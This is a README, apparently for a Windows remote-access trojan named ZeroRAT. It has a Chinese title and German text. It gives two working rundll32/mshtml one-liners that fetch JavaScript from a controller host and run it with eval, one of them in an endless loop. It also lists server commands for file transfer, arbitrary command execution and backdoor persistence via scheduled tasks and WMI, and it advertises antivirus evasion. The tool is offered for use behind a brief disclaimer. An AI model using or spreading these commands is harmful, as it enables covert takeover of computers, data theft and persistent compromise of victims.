
ZeroRAT是一款windows上的一句话远控
#ZeroRAT ##Einführung Fernsteuerung für Windows. Der Client benötigt nur einen Befehl, nutzt native Windows-Programme zur Ausführung, schreibt keine Dateien auf die Festplatte, hat natürliche antivirale Eigenschaften. Funktioniert nach Neustart nicht mehr.
Download und Upload im Programm sind aus Sicht des Clients. Der Client lädt eine Datei vom Server herunter (download), der Client lädt eine Datei auf den Server hoch (upload).
##Konfiguration Ändern Sie in config.py die Adresse für die Client-Verbindung und das Admin-Passwort. Denken Sie daran, zu überprüfen, ob Debug deaktiviert ist.
Das Programm benötigt Flask und sqlite3. Installieren Sie es selbst mit pip.
##Client
Ersetzen Sie <ip>:<port> durch die tatsächliche Verbindungsadresse
Normale Version
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Unsterbliche Version
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Server
Backend: http://<ip>:<port>/server/
Der Server unterstützt die folgenden Befehle:
sessions Listet aktive Clients aufuse <id> Wählt einen Client anhand der ID ausset <key> <value> Setzt globale Variablenshow globals/downloads/uploads Zeigt globale Variablen, vom Client herunterladbare Dateien, vom Client hochgeladene Dateiendelete session Löscht den aktuellen Clientdelete download/upload <id> Löscht Dateien nach IDupfile Lädt eine Datei auf den Server hoch und fügt sie zur Downloads-Liste hinzudownload Setzt die Variablen download_file und download_save_path, damit der Client die Datei herunterlädt und unter download_save_path speichertupload Setzt die Variable upload_file, damit der Client die Datei auf den Server hochlädtbackdoor tasks <time> Hinterlegt eine Backdoor über die Windows-Aufgabenplanung, Zeitformat 00:00backdoor wmi Hinterlegt eine Backdoor über WMI, wird jede Stunde ausgeführtAlle anderen Befehle werden als Windows-Systembefehle ausgeführt.
Details zu den Befehlen finden Sie in /static/js/xkcd_cli.js
##Entwicklung Backend-Befehle verwalten den Client: /static/js/xkcd_cli.js
Backend-Befehle verwalten den Server: /controllers/server.py
Client-Verwaltung: /controllers/client.py
Client-Payload-Generierung: payload.py
Datenbankoperationen: /models/
##Kontakt http://5alt.me
md5_salt [AT] qq.com
##Referenzen https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Haftungsausschluss Bei der Nutzung dieses Tools müssen Sie die lokalen Gesetze einhalten. Es darf nur zu akademischen Testzwecken verwendet werden. Die illegale Kontrolle fremder Computer ist strengstens untersagt. Bei entstehenden Schäden übernimmt der Autor keine Haftung.
##Lizenz GPLV3
##TODO
meterpreter shellcode Installiert Meterpreter mittels Shellcode über InstallUtil. Vorher LHOST und LPORT setzen (nach Migration können Befehle empfangen werden, benötigt .NET Framework 2.0)meterpreter powershell Installiert Meterpreter über PowerShell (benötigt PowerShell 1.0)